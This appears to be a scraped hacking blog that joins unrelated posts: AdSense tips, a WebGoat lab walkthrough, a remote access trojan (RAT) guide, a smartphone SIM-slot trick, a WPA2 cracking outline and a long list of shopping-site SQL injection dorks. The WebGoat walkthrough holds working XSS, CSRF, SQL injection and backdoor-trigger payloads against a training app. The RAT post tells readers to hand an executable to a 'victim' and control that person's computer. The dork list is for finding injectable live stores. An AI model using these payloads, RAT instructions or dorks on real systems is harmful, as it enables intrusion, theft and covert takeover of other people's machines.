Best methods for AdSense earning in 2023

AdSense by Google is a widely used advertising program that enables website proprietors to generate revenue by displaying ads on their web pages. With the ever-changing landscape of digital advertising, it can be challenging to keep up with the best methods for AdSense earning in 2023. In this blog post, we will explore some of the top strategies for maximizing your AdSense earnings this year.

1. Focus on High-Quality Content The key to successful AdSense earnings in 2023 is to focus on creating high-quality content that is both engaging and informative. Your content should be relevant to your target audience and provide value to your readers. Google rewards websites that produce high-quality content with higher AdSense earnings, so investing in quality content is a wise decision.

2. Optimize Ad Placement Ad placement is another critical factor that can impact your AdSense earnings. You want to ensure that your ads are placed in prominent areas where your readers are likely to notice them. For instance, placing your ads above the fold or near your content can help increase visibility and clicks. However, it's essential to avoid placing too many ads on a page, as this can lead to a poor user experience.

3. Experiment with Ad Formats Google offers various ad formats, including display ads, text ads, and native ads. Experimenting with different ad formats can help you identify the ones that work best for your website and audience. For instance, if you have a highly visual website, display ads may be more effective than text ads.

4. Implement AdSense Auto Ads AdSense Auto Ads is a new feature that uses machine learning to optimize ad placement on your website. With Auto Ads, you don't have to worry about ad placement, as Google automatically places ads in the best locations on your site. This can help increase your AdSense earnings while saving you time and effort.

5. Monitor Your Performance Monitoring your AdSense performance is crucial to identifying areas for improvement. You can use the AdSense dashboard to track your earnings, impressions, and clicks, among other metrics. Use this data to optimize your ad placement and content strategy continually.

In conclusion, AdSense earning in 2023 is all about producing high-quality content, optimizing ad placement, experimenting with ad formats, using AdSense Auto Ads, and monitoring your performance. By following these strategies, you can increase your AdSense earnings while providing value to your readers. Remember to always comply with Google's AdSense policies and guidelines to avoid penalties and account suspension.

Webgoat walkthrough 

Hello guys
This is Shubham Choudhary back with some new and interesting stuff on cyber security. After a long time i prepared a new session about web application penetration testing which is a walkthrough of a vulnerable application webgoat.
WEBGOAT is a demo vulnerable application which is designed by OWASP to learn the practical approach of exploitation of different web vulnerabilities that may exist in real life application.
 There are many blogs and information related to the vulnerability of website but they just stick to theoretical concepts so i decided to give you some practical hands on experience these vulnerabilities and it  will help you to learn and grow in WAPT field.

General

1. Http Basics :- type user name in reverse format and submit

2. Http Splitting :- http redirect

en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 31
<html>Perdeu playboy!</html>
 :- Cache poisioning
en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Oct 2222 15:27:28 GMT
Content-Length: 31
<html>Perdeu playboy!</html>

Access Control Flaws

1. Using an Access Control Matrix : User Larry is Account Manager
2. Bypass a Path Based Access Control Scheme
:-  An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml
    : Step1 :- select any file and Inspect Element and change the value="../../reportBug.jsp"
    : Step2 :-  View file

LAB: Role Base Access Control

Stage 1: Bypass Business Layer Access Control
        user "Tomcat" pass "tom"
        :- Open Burpsuit and start Interception (click on ViewProfile) and (change action=ViewProfile to action=DeleteProfile)

Stage 2:
        (Developer Version of Webgoat)

Stage 3: Bypass Data Layer Access Control
        User "Tomcat" Pass "tom"
        :- Login with tomcat user and click on "SearchStaff" and type another Username like "Larry" and click on "Find Profile" and "EditProfile" chage the profile content and click on "update profile"

Stage 4:
        (Developer Version of Webgoat)

   

 Remote Admin Access

        ( Require Developer version of webgoat so i m skipping this)

Ajax Security

1. Same Origin Policy Protection:-

click here to try a same origin request (lessons/Ajax/sameOrigin.jsp)
submit Congratulation    :- click here to try a different origin request (http://www/google.com/search?q=aspect+security)

2. LAB: DOM-Based cross-site scripting

stage 1: open the image location and copy and paste into script <IMG SRC="imgaes/logos/owasp.jpg"/>

stage 2: Type any (img src) alert script to complete stage <img src=x onerror="alert('any text')">

stage 3: use any (iframe alert script) to complete stage <iframe src=javascript:alert("Hacked!!")></iframe>

stage 4: copy and paste the code into column and type any password (submit)

stage 5: Open the file DOMXSS.js location : /owaspbwa/owaspbwa-svn/var/lib/tomcat6/webapps/WebGoat/javascript/escape.js on 
        server side
        function displayGreeting(name) {
if (name != ''){
document.getElementById("greeting").innerHTML="Hello, " +escapeHTML(name)+ "!";
}
}
    'And' finally write the escapeHTML(name) and save the file
     go to clint side and run any (IMG SRC) alert script
   

3. LAB: Client Side Filtering

stage 1: select the choose employee and right click to (Inspect Element) and find the salary of  Bartholomew's salary
        (450000) and submit
     
stage 2: Open the file on server side (location: /var/lib/tomcat6/webapps/WebGoat/lessons/Ajax/clientSideFiltering.jsp)
        and add this code
        :)
Remplacer : Delete this code from the file
   StringBuffer sb = new StringBuffer();
   sb.append("/Employees/Employee/UserID | ");
   sb.append("/Employees/Employee/FirstName | ");
   sb.append("/Employees/Employee/LastName | ");
   sb.append("/Employees/Employee/SSN | ");
   sb.append("/Employees/Employee/Salary ");
   String expression = sb.toString();
Par : And paste this code
   StringBuffer sb = new StringBuffer();
   sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/UserID | ");
   sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/FirstName | ");
   sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/LastName | ");
   sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/SSN | ");
   sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/Salary ");
   String expression = sb.toString();
 

4. DOM Injection

    Enable Activate Button (Inspect Element) and Delete the "Disable field" [disable=""]

5. XML Injection

    Copy your account ID 836239 And paste : submit

    'And'  check all the checkbox and Intercept the request and add the another checkbox field and change Checkbox I'd and
    forward
    :Congratulations:
 

6. JSON Injection

    Right click on $600 and (Inspect Element) and change the price and submit
 

7. Silent Transactions Attacks

    Right click and (Inspect Element) and goto console and submit this javascript
    javascript:submitData(1234,99999999);
 

8. Dangerous Use of Eval

    Paste This (alert Script) in three digit of Access code
    Script:-  123');alert(document.cookie);('
 

9. Insecure Client Storage

Stage 1: Select whole items in Shopping Cart and (Inspect Element) goto "Console"  and paste this JAVA script
    Script :- javascript:alert(decrypt('emph'));
 
Stage 2: Type your Old Coupon code "GOLD"/another and intercept the "Purchase Request" and chage ( GRANDTOT=%0 ) and Forward the request
        :Congratulation:
   

Authentication Flaws

1. Password Strength
    How Much time you need for these passwords?
    password = 123456 (0)seconds
    password = abzfez (1394)seconds
    password = a9z1ez (5)hours
    password = aB8fEz (2)days
    password = z8!E?7 (41)days
 
    Type these Values in blank column (Because the Website {https://www.cnlab.ch/codecheck} is not availabe for This Version of WebGoat)
    And press GO

2. Forgot Password

    Username: admin
    Color: green
 
3. Basic Authentication

    Intercept the Submit request using Burpsuit and copy Authorization: Basic (base64) hash
    and paste in the authentication header: (Authorization)
    decode the value authentication header: (guest:guest)
    Submit : Congratulation
    After this Congratulation success (Type same guest:guest@ in the url) like http://guest:guest@192.168.1.20/Webgoat
    restart the machine
    :COMPLETED:
 
4. Multi Level Login 2

    Try This Lesson After you have complete the (Multi Level Lovin 1)
    Login as username: Joe and password: banana)
    and type the TAN which you want to show And Intercept the request and change of Joe to Jane and forward the request
 
5. Multi Level Login 1

stage 1: Login using username and password :Jane:tarzan: use Tan1
    After this
stage 2: Login again using same things
    And Inspect the value of Tan2 and change the Tan value to 1
    Submit:congratulation:

Buffer Overflows : 

Off-by-one Overflows

step 1: Login with any username and type any Room no
        and select (Web Developer) addons and show hidden field and typpe 4096 Characters in "Room No" filed and click on Accept
        and click on (webDeveloper) and show hidden field
Step 2: Now choose the VIP Hotel member and Loing with the username and RoomNo

Code Quality:

 Discover Clues in the HTML
    press (CTRL+U) to view the source code of Html and find the weekness in the code
    (In green field FIXME's:- admin:adminpw)

Concurrency:

1. Thread Safety Problems

    Open two browsers and type username "Jeff" in First browsers and "Dave" in another Browser
    and click on Submit Button at the same time
    Congratulation :

2.  Shopping Cart Concurrency Flaws
step 1: Open two browser and Select 1 Product 169$ in One browser
        and second browser select same product with high quantity like 10 pcs
step 2: first browser click on "update and purchase" and second browser click on "update cart"
        and click on first browser click on "confirm"
Congratulation :

Cross Site Scriptiong (XSS)

1. Phishing with XSS :

    Paste this script in the search tab and click on search

<script>   function hack(){     alert("Login="+document.forms[0].user.value       + "Password="+document.forms[0].pass.value);     XSSImage=new Image;     XSSImage.src="http://localhost:8080/WebGoat/catcher"       +"?PROPERTY=yes"       +"&user="+document.forms[0].user.value       +"&password="+document.forms[0].pass.value;   } </script>  <form>   <br><br><HR>   <H3>This feature requires account login:</H3>   <br><br>   Enter Username:<br><input type="text" id="user" name="user"><br>   Enter Password:<br><input type="password" name="pass"><br>   <input type="submit" name="login" value="login" onclick="hack()"> </form>  <br><br><HR>

2. LAB: Cross SIte Scripting

stage 1: stored XSS :- Login with username "Tom Cat" and password is "tom" and click on "ViewProfile" click on "EditProfile"

        and Paste this script into the "street column"

script:  <script>alert('You\'ve been hacked by Tom');</script>and click on "UpdateProfile" and (EditProfile and logout) After this Login with username "Jerry" password "jerry"

        and click on view profile

    Congratulation::

    

Stage 2: Block Stored XSS using input Validation

        (Developer Version of Webgoat)

        

Stage 3: Stored XSS Revisited

        Login with username "Bruce McGuirre" password "bruce" and click on "ViewProfile"

    Congratulation::

    

Stage 4: Block Stored XSS using Output Encoding

        (Developer version of WebGoat)

        

Stage 5: Reflected XSS

        Login with username "Larry Stooge" password "larry" and click on "SearchStaff" and paste this script

script:- <script>alert('vulnerable form');</script>

        Congratulation::

Stage 6: Block Reflected XSS

        (Developer Version of Webgoat)

        

3. Stored XSS Attacks:-
Type any Title name and paste this script into Message box and click on Submit

    Script:- <script>alert('vulnerable form');</script>

    

4. Reflected XSS Attack:- 
Paste this Scrip into (Three digit access code)

    Script:- <script>alert('vulnerable form');</script>

5. Cross Site Request Forgery (CSRF) :- 
type any title and paste this script into "message box" click on submit

    Script:- <img src="http://localhost:8080/WebGoat/attack?Screen=13&menu=900&transferFunds=5000" width="1"

    height="1" />

    

6. CSRF Promt By-pass:-
type any title and paste this script into "message box" click on submit

    Script:- 

    <iframe id=shubh src="http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=5000" onload="document.getElementById('shubh').src='http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=CONFIRM';"></iframe>
<iframe id="shubh" framborder="1" width="800" scrolling="yes" height="300"></iframe>

    (And Refresh your Page Congratulation:::)

    

7. CSRF Token Bypass:-
type any title and paste this script into "message box" click on submitScript:- <img src="http://localhost:8080/WebGoat/attack?Screen=13&menu=900&transferFunds=4000&transferFunds=main" width="1"height="1" />

     and submit

        Congratulation:::

8. HTTP Only test:- 
Simple one time select "no" and (click on read cookie and write cookie)

                    And Second time select "yes" and (click on read cookie and write cookie)

                    

9. Cross Site Tracing (XST) Attacks:-
Enter this Script into (Three digit security code field) and click on Purchase

    Script:-

<script>

var xhr = new XMLHttpRequest();

xhr.open('TRACE', 'http://test.lab/', false);

xhr.send(null);

if(200 == xhr.status)

alert(xhr.responseText);

</script>

Improper Error Handling

Fail Open Authentication Scheme

    Type username "Admin" and (Inspect the password) field and Delete the password field
    Congratulation:::

Injection Flaws

1. Command Injection :- 
 
   1st we need to remove drop down box
we can do using web developer>forms>convert select element to form
than we can inject command directly like "& ipconfig"

2. Numeric Sql Injection:- 

Select Columbia and intercept the request and type (SQL Injection query) into the tempreture field 

    like (101 or 1=1) and forward the request

    

3. Log Spoofing:-

Part 1
type in user name "Lim%0d%0aLogin succeeded for username:admin"
part2
add script also "Lim%0d%0aLogin succeeded for username:admin<script>alert("Admin login sucessful")</script>"

4. XPATH Injection:-

Type this code into username field (a' or 1=1 or 'a'='a) and password field (hack)

    Congratulation:::

    

5. String SQL Injection:-

Type this code into Your Last Name field and hit enter (a' or 1=1 or 'a'='a)

6. LAB: SQL Injection

Stage 1: String Sql Injection

        Login with username "Neville" and type "any password" into password field and (intercept the request) and type sql string into password field

        (a' or 1='1) and forward the request.

    

Stage 2: Parameterized Query

        (Developer version of Webgoat)

Stage 3: Numeric SQL injection

        Login with username "Larry" password "larry" and intercept larry (view profile) and edit the                larry profile id with this code

        (101 or 1=1 order by salary desc)

        Congratulation:::

        

Stage 4: Parameterized Query

        (Developer version of Webgoat)

     
7. Modify Data with SQL injection:-  

paste this SQL String (jsmith';update salaries set salary=100000 where userid='jsmith) in "Enter your userid"

8. Add Data with SQL injection:- 

Paste this SQL String (jsmith';insert into salaries values('nome',10);--) in "enter your userid"

9. Database Backdoors:-

Stage 1: Paste this query in the "userid" column (101;update salaries set salary=100000 where userid=101) 

Stage 2: Paste this second query (CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid)

            

10. Numeric Blind SQL injection:-
     Type this SQL string in Account Number field 

     {(101 AND (SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 ); } 

        and Account number is Valid

        answer is (2364)

        

11. Blind String SQL Injection:- "This session is very much like the previous session.

Step 1: using This code to confirm the name is "J" 

           {101 AND (SUBSTRING((SELECT name FROM pins WHERE   cc_number='4321432143214321'), 1, 1) = 'J' );}

Step 2: Repeate this with the 2nd letter either using the < or > sign to reduce the range. follow by                    the = sign to confirm the letter

{101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'i' );}

        The second letter is "i" So the name is Ji**.

        IF you Continue the process, you will find the name is "Jill".

or

101 AND (SELECT ASCII(SUBSTR(name,1,1)) from pins WHERE cc_number=4321432143214321) =$ --

intercept and send to intruder brute force on place of first 1 (from no. 1 to 5)and $(from no. 70 to 120)
enter the correct value in the above command found though intruder
enter the name found

Denial of Service

Denial of Service from Multiple Logins :-

Login with SQL string username (1' or 1='1) password (1' or 1='1) And choose any three user and LOgin

    Congratulation::::

Insecure Configuration 

Forced Browsing:- 

(192.168.1.100/WebGoat/attack?Screen=37&menu=1400&succeeded=yes) (192.168.1.100/WebGoat/conf) changes in url and hit enter.

    Congratulation:::

    

Insecure Storage

Encoding Basics:-
                    enter the string "abc" in the list below you see the encoded value of the string.                                      For Rot13 encoding this is nop 

                    now enter the string "a c" and chek for url encoding

                    answer: a+c    Congratulation::::

Malicious File Execution 

Save this code in ".jsp" file and upload it

<HTML> <% java.io.File file = new java.io.File("filepath\\guest.txt"); file.createNewFile(); %> </HTML>

    (Right click on image and click on copy image location) & (Open new Tab and paste it & refresh webgoat page)

    

    Congratulation:::

Parameter Tampring

1. Bypass HTML Field Restrictions:- 

Step 1: Inspect the (Disable input field) and enable it and type anyting 

Step 2: Intercept request and change all the fileds and "forward request"

Like this:        select=foo&radio=foo&checkbox=on&shortinput=12345&disabledinput=kjsdakl&SUBMIT=Submit

        (select=foo123&radio=foo123&checkbox=on&shortinput=12345123&disabledinput=kjsdakl123&SUBMIT=Submit123)

2. Exploit Hidden Fields:- 

Intercept Request and change Price of HDTV

3. Exploit Unchecked Email:- 

Step 1: paste any alert script in Comments box : <script>alert('hacked');</script> : and Send

Step 2: Paste any alert script in comments box : <script>alert('hacked2');</script> : & click on send and Intercept the request (change Admin to Guest) and forward the request

4. Bypass Client Side JavaScript Validation:-

Intercept the Request and change the all field to (oposite) and forward request

Session Management Flaws

Hijack a session

intercept the request and delete the WEAKID field and intercept the response

select the WEAKID and snd it the sequencer anlyse and save token in a file to compare sort the token file find missing no. in first half send it to intruder and bruteforce in second half last two no.(check for range in sorted list gap)

once done refresh page

Spoof an authentication session

login with different user check user cookies find the pattern make cookies for alice set it in browser refresh page 

Session Fixation attack

stage 1:

add       &SID=whatever      at the end of href tag

stage 2:

click on got hills financial

stage 3:

login with username and pass

stage 4:

first change SID=NOVALIDPASS to SID=whatever in url

login with username jane and pass tarzan

change SID=NOVALIDPASS to SID=whatever in url

refresh page

Web Services

1. Create a SOAP Request:

Stage 1: How many operations are defined in the WSDL:- Right click on (Webgoat WSDL FILE) and open it to another tab and find (SOAP Request)

<wsdl:portType name="SoapRequest">

1.<wsdl:operation name="getFirstName" parameterOrder="id">

<wsdl:input message="impl:getFirstNameRequest" name="getFirstNameRequest"/>

<wsdl:output message="impl:getFirstNameResponse" name="getFirstNameResponse"/>

</wsdl:operation>

2.<wsdl:operation name="getLastName" parameterOrder="id">

<wsdl:input message="impl:getLastNameRequest" name="getLastNameRequest"/>

<wsdl:output message="impl:getLastNameResponse" name="getLastNameResponse"/>

</wsdl:operation>

3.<wsdl:operation name="getCreditCard" parameterOrder="id">

<wsdl:input message="impl:getCreditCardRequest" name="getCreditCardRequest"/>

<wsdl:output message="impl:getCreditCardResponse" name="getCreditCardResponse"/>

</wsdl:operation>

4.<wsdl:operation name="getLoginCount" parameterOrder="id">

<wsdl:input message="impl:getLoginCountRequest" name="getLoginCountRequest"/>

<wsdl:output message="impl:getLoginCountResponse" name="getLoginCountResponse"/>

</wsdl:operation>

And you see 4 Operations in "Soap Request"

(answer= 4)

Stage 2: read the service code again for the parameter type the type is "int"

<wsdl:message name="getLastNameRequest">

<wsdl:part name="id" type="xsd:int"/>

Stage 3: Press to generate HTTP request

    (NOt Complete)

    

WSDL scaning

open wsdl file check all methods there is a method of getCreditCard
now select option intercept method and change it to getCreditCard

Web service SAX injection

inject in password field

newpassword</password>
    </wsns1:changePassword>
    <wsns1:changePassword>
      <id xsi:type='xsd:int'>102</id>
      <password xsi:type='xsd:string'>notforyoutoknow

Challenge

stage 1:
check the java source file using this link
http://localhost:8080/WebGoat/source?source=true

stage 2:
intercept the post request with the help of web scarab and change the value white to white'or'1'='1

        

     
NOTE:-get a professional training of web application penetration testing at shubhamchoudharyhacker.com

Hack a Laptop n do anything with Rat 

hey friends after a long time today i will tell you about hacking a windows machine with RAT so this is very easy to configure a rat you just have to configure it's listening ip and port in the setting and create a server after that you have to give this rat to your victim if the victim execute it and actively use internet than yo will definitely get the reverse connection of his pc and you can do whatever the hell you want to do with that victim's pc remotely. 

Some best rats are listed below:-

• Cybergate
• Net Bus
• nano core
• spy note
• Beast
• Dark Commet
• Black Hole

  

These Rat can be of two types;

• LAN RAT
• WAN RAT

LAN RAT:

In the LAN RAT you just have to put your ip address and port no. to listen the reverse connection of rat than you have to create .exe file(server) . After that you have to give that .exe file to victim an when he execute that file you will get his reverse connection .

Demonstration:

WAN RAT:

• first you need to create a hostname to make you your ip dynamic . You can do that with  https://www.noip.com/  
• After that you have to do 'port Forwading in your Router.
• Than same procedure as the LAN RAT but in place of ip you have to write your hostname in configuring RAT

NOTE: you can even offer me work for training you ethical hacking on  shubhamchoudharyhacker.com

Hybrid Sim Slot life hack of latest smartphones:

Hello guys this today i will not be talking about any technical hacks like i always do .

today i will demonstrate you a life hack Trick Indians my  also call it a jugad technique as we are world most efficient country in this technique :)   :0

So now a days most of the smartphone manufacturing companies like Samsung, HTC, Xiaomi etc are giving a great feature in their smartphone which is Hybrid  Sim Slot . Which gives as the capability to use a sim or a memory card  in a single slot but according to companies and their design they said that a person can use only one thing at a time .

But for the Jugadu person of our country nothing is impossible ;p

NOTE: you can even offer me work for training you ethical hacking on  shubhamchoudharyhacker.com

Watch this video guys and use your sim and  memory card both in a single Hybrid slot of any company smartphone. 

WPA2 Wifi Hacking:

hello guys most of you had ask me to suggest wpa2 wifi hacking as it is the latest wifi encryption security.

so let me tell you that the wpa2 secured wifi is only vulnerable to brute force attack so if anybody want to hack this wifi he should have a good quality of wordlist and a linux operating system.

Linux tool used in wifi hacking

airmon-ng

airodump-ng

aireplay-ng

aircrack-ng

Procedures can be seen in video

See guys its little tough to understand but don't worry you will soon learn it and for the doubt i m always there to help you :-)

NOTE: you can even offer me work for training you ethical hacking on  shubhamchoudharyhacker.com

LATEST SHOPPING SQL DORKS (september 2016):

accinfo.php?cartId=

acclogin.php?cartID=

add.php?bookid=

add_cart.php?num=

addcart.php?

addItem.php

add-to-cart.php?ID=

addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id=

cart_additem.php?id=

cart_validate.php?id=

cartadd.php?id=

cat.php?iCat=

catalog.php

catalog.php?CatalogID=

catalog_item.php?ID=

catalog_main.php?catid=

category.php

category.php?catid=

category_list.php?id=

categorydisplay.php?catid=

checkout.php?cartid=

checkout.php?UserID=

checkout_confirmed.php?order_id=

checkout1.php?cartid=

comersus_listCategoriesAndProducts.php?idCategory=

comersus_optEmailToFriendForm.php?idProduct=

comersus_optReviewReadExec.php?idProduct=

comersus_viewItem.php?idProduct=

comments_form.php?ID=

contact.php?cartId=

content.php?id=

customerService.php?****ID1=

default.php?catID=

description.php?bookid=

details.php?BookID=

details.php?Press_Release_ID=

details.php?Product_ID=

details.php?Service_ID=

display_item.php?id=

displayproducts.php

downloadTrial.php?intProdID=

emailproduct.php?itemid=

emailToFriend.php?idProduct=

events.php?ID=

faq.php?cartID=

faq_list.php?id=

faqs.php?id=

feedback.php?title=

freedownload.php?bookid=

fullDisplay.php?item=

getbook.php?bookid=

GetItems.php?itemid=

giftDetail.php?id=

help.php?CartId=

home.php?id=

index.php?cart=

index.php?cartID=

index.php?ID=

info.php?ID=

item.php?eid=

item.php?item_id=

item.php?itemid=

item.php?model=

item.php?prodtype=

item.php?shopcd=

item_details.php?catid=

item_list.php?maingroup

item_show.php?code_no=

itemDesc.php?CartId=

itemdetail.php?item=

itemdetails.php?catalogid=

learnmore.php?cartID=

links.php?catid=

list.php?bookid=

List.php?CatID=

listcategoriesandproducts.php?idCategory=

modline.php?id=

myaccount.php?catid=

news.php?id=

order.php?BookID=

order.php?id=

order.php?item_ID=

OrderForm.php?Cart=

page.php?PartID=

payment.php?CartID=

pdetail.php?item_id=

powersearch.php?CartId=

price.php

privacy.php?cartID=

prodbycat.php?intCatalogID=

prodetails.php?prodid=

prodlist.php?catid=

product.php?bookID=

product.php?intProdID=

product_info.php?item_id=

productDetails.php?idProduct=

productDisplay.php

productinfo.php?item=

productlist.php?ViewType=Category&CategoryID=

productpage.php

products.php?ID=

products.php?keyword=

products_category.php?CategoryID=

products_detail.php?CategoryID=

productsByCategory.php?intCatalogID=

prodView.php?idProduct=

promo.php?id=

promotion.php?catid=

pview.php?Item=

resellers.php?idCategory=

results.php?cat=

savecart.php?CartId=

search.php?CartID=

searchcat.php?search_id=

Select_Item.php?id=

Services.php?ID=

shippinginfo.php?CartId=

shop.php?a=

shop.php?action=

shop.php?bookid=

shop.php?cartID=

shop_details.php?prodid=

shopaddtocart.php

shopaddtocart.php?catalogid=

shopbasket.php?bookid=

shopbycategory.php?catid=

shopcart.php?title=

shopcreatorder.php

shopcurrency.php?cid=

shopdc.php?bookid=

shopdisplaycategories.php

shopdisplayproduct.php?catalogid=

shopdisplayproducts.php

shopexd.php

shopexd.php?catalogid=

shopping_basket.php?cartID=

shopprojectlogin.php

shopquery.php?catalogid=

shopremoveitem.php?cartid=

shopreviewadd.php?id=

shopreviewlist.php?id=

ShopSearch.php?CategoryID=

shoptellafriend.php?id=

shopthanks.php

shopwelcome.php?title=

show_item.php?id=

show_item_details.php?item_id=

showbook.php?bookid=

showStore.php?catID=

shprodde.php?SKU=

specials.php?id=

store.php?id=

store_bycat.php?id=

store_listing.php?id=

Store_ViewProducts.php?Cat=

store-details.php?id=

storefront.php?id=

storefronts.php?title=

storeitem.php?item=

StoreRedirect.php?ID=

subcategories.php?id=

tek9.php?

template.php?Action=Item&pid=

topic.php?ID=

tuangou.php?bookid=

type.php?iType=

updatebasket.php?bookid=

updates.php?ID=

view.php?cid=

view_cart.php?title=

view_detail.php?ID=

viewcart.php?CartId=

viewCart.php?userID=

viewCat_h.php?idCategory=

viewevent.php?EventID=

viewitem.php?recor=

viewPrd.php?idcategory=

ViewProduct.php?misc=

voteList.php?item_ID=

whatsnew.php?idCategory=

WsAncillary.php?ID=

WsPages.php?ID=noticiasDetalle.php?xid=

sitio/item.php?idcd=

index.php?site=

de/content.php?page_id=

gallerysort.php?iid=

products.php?type=

event.php?id=

showfeature.php?id=

home.php?ID=

tas/event.php?id=

profile.php?id=

details.php?id=

past-event.php?id=

index.php?action=

site/products.php?prodid=

page.php?pId=

resources/vulnerabilities_list.php?id=

site.php?id=

products/index.php?rangeid=

global_projects.php?cid=

publications/view.php?id=

display_page.php?id=

pages.php?ID=

lmsrecords_cd.php?cdid=

product.php?prd=

cat/?catid=

products/product-list.php?id=

debate-detail.php?id=

cbmer/congres/page.php?LAN=

content.php?id=

news.php?ID=

photogallery.php?id=

index.php?id=

product/product.php?product_no=

nyheder.htm?show=

book.php?ID=

print.php?id=

detail.php?id=

book.php?id=

content.php?PID=

more_detail.php?id=

content.php?id=

view_items.php?id=

view_author.php?id=

main.php?id=

english/fonction/print.php?id=

magazines/adult_magazine_single_page.php?magid=

product_details.php?prodid=

magazines/adult_magazine_full_year.php?magid=

products/card.php?prodID=

catalog/product.php?cat_id=

e_board/modifyform.html?code=

community/calendar-event-fr.php?id=

products.php?p=

news.php?id=

view/7/9628/1.html?reply=

product_details.php?prodid=

catalog/product.php?pid=

rating.php?id=

?page=

catalog/main.php?cat_id=

index.php?page=

detail.php?prodid=

products/product.php?pid=

news.php?id=

book_detail.php?BookID=

catalog/main.php?cat_id=

catalog/main.php?cat_id=

default.php?cPath=

catalog/main.php?cat_id=

catalog/main.php?cat_id=

category.php?catid=

categories.php?cat=

categories.php?cat=

detail.php?prodID=

detail.php?id=

category.php?id=

hm/inside.php?id=

index.php?area_id=

gallery.php?id=

products.php?cat=

products.php?cat=

media/pr.php?id=

books/book.php?proj_nr=

products/card.php?prodID=

general.php?id=

news.php?t=

usb/devices/showdev.php?id=

content/detail.php?id=

templet.php?acticle_id=

news/news/title_show.php?id=

product.php?id=

index.php?url=

cryolab/content.php?cid=

ls.php?id=

s.php?w=

abroad/page.php?cid=

bayer/dtnews.php?id=

news/temp.php?id=

index.php?url=

book/bookcover.php?bookid=

index.php/en/component/pvm/?view=

product/list.php?pid=

cats.php?cat=

software_categories.php?cat_id=

print.php?sid=

docDetail.aspx?chnum=

index.php?section=

index.php?page=

index.php?page=

en/publications.php?id=

events/detail.php?ID=

forum/profile.php?id=

media/pr.php?id=

content.php?ID=

cloudbank/detail.php?ID=

pages.php?id=

news.php?id=

beitrag_D.php?id=

content/index.php?id=

index.php?i=

?action=

index.php?page=

beitrag_F.php?id=

index.php?pageid=

page.php?modul=

detail.php?id=

index.php?w=

index.php?modus=

news.php?id=

news.php?id=

aktuelles/meldungen-detail.php?id=

item.php?id=

obio/detail.php?id=

page/de/produkte/produkte.php?prodID=

packages_display.php?ref=

shop/index.php?cPath=

modules.php?bookid=

product-range.php?rangeID=

en/news/fullnews.php?newsid=

deal_coupon.php?cat_id=

show.php?id=

blog/index.php?idBlog=

redaktion/whiteteeth/detail.php?nr=

HistoryStore/pages/item.php?itemID=

aktuelles/veranstaltungen/detail.php?id=

tecdaten/showdetail.php?prodid=

?id=

rating/stat.php?id=

content.php?id=

viewapp.php?id=

item.php?id=

news/newsitem.php?newsID=

FernandFaerie/index.php?c=

show.php?id=

?cat=

categories.php?cat=

category.php?c=

product_info.php?id=

prod.php?cat=

store/product.php?productid=

browsepr.php?pr=

product-list.php?cid=

products.php?cat_id=

product.php?ItemID=

category.php?c=

main.php?id=

article.php?id=

showproduct.php?productId=

view_item.php?item=

skunkworks/content.php?id=

index.php?id=

item_show.php?id=

publications.php?Id=

index.php?t=

view_items.php?id=

portafolio/portafolio.php?id=

YZboard/view.php?id=

index_en.php?ref=

index_en.php?ref=

category.php?id_category=

main.php?id=

main.php?id=

calendar/event.php?id=

default.php?cPath=

pages/print.php?id=

index.php?pg_t=

_news/news.php?id=

forum/showProfile.php?id=

fr/commande-liste-categorie.php?panier=

downloads/shambler.php?id=

sinformer/n/imprimer.php?id=

More_Details.php?id=

directory/contenu.php?id_cat=

properties.php?id_cat=

forum/showProfile.php?id=

downloads/category.php?c=

index.php?cat=

product_info.php?products_id=

product_info.php?products_id=

product-list.php?category_id=

detail.php?siteid=

projects/event.php?id=

view_items.php?id=

more_details.php?id=

melbourne_details.php?id=

more_details.php?id=

detail.php?id=

more_details.php?id=

home.php?cat=

idlechat/message.php?id=

detail.php?id=

print.php?sid=

more_details.php?id=

default.php?cPath=

events/event.php?id=

brand.php?id=

toynbeestudios/content.php?id=

show-book.php?id=

more_details.php?id=

store/default.php?cPath=

property.php?id=

product_details.php?id=

more_details.php?id=

view-event.php?id=

content.php?id=

book.php?id=

page/venue.php?id=

print.php?sid=

colourpointeducational/more_details.php?id=

print.php?sid=

browse/book.php?journalID=

section.php?section=

bookDetails.php?id=

profiles/profile.php?profileid=

event.php?id=

gallery.php?id=

category.php?CID=

corporate/newsreleases_more.php?id=

print.php?id=

view_items.php?id=

more_details.php?id=

county-facts/diary/vcsgen.php?id=

idlechat/message.php?id=

podcast/item.php?pid=

products.php?act=

details.php?prodId=

socsci/events/full_details.php?id=

ourblog.php?categoryid=

mall/more.php?ProdID=

archive/get.php?message_id=

review/review_form.php?item_id=

english/publicproducts.php?groupid=

news_and_notices.php?news_id=

rounds-detail.php?id=

gig.php?id=

board/view.php?no=

index.php?modus=

news_item.php?id=

rss.php?cat=

products/product.php?id=

details.php?ProdID=

els_/product/product.php?id=

store/description.php?iddesc=

socsci/news_items/full_story.php?id=

modules/forum/index.php?topic_id=

feature.php?id=

products/Blitzball.htm?id=

profile_print.php?id=

questions.php?questionid=

html/scoutnew.php?prodid=

main/index.php?action=

********.php?cid=

********.php?cid=

news.php?type=

index.php?page=

viewthread.php?tid=

